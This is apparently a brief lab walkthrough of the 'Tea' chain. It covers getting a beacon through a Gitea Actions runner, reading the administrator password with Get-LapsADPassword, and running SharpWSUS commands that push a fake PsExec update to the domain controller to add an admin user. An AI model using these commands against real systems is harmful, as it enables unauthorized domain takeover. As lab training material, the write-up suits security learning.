Tea (chain) (medium)

port scan

10.10.178.198 srv.tea.vl

10.10.178.197 dc.tea.vl

so there have a runner, we will create a action let runner execute our evil code

i will create a new repo with .gitea/workflows/demo.yaml

add our evil job

push!

after push, we must enable actions at our repo

just commit again with every change

it works now

we have a beacon!

dotnet inline-execute /home/sh4n4c1/.sliver-client/aliases/sharp-hound-4/SharpHound.exe --zippassword backup123 --outputdirectory C:\windows\tasks

in _instal folder, there have a laps installer

we can use Get-LapsADPassword -Identity SRV -AsPlainText read administrator password

work

ther have a folder called WSUS-Updates

get a administrator beacon and run sharpwsus inspect

it show srv is wsus server, we can use

https://github.com/techspence/SharpWSUS to abuse wsus

we will push psexec (just allow ms sign), and add a user

C:\_install\SharpWSUS.exe create /payload:"c:\_install\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c \"net user shanacl Password123! /add\""

then approve the request

C:\_install\SharpWSUS.exe approve /updateid:57d84ee8-c48d-41da-839b-200002f56996 /computername:dc.tea.vl /groupname:"pepepe"

it works

and the user at there

now try again to add our evil user into administrators group

administrator shell!

Last updated 1 year ago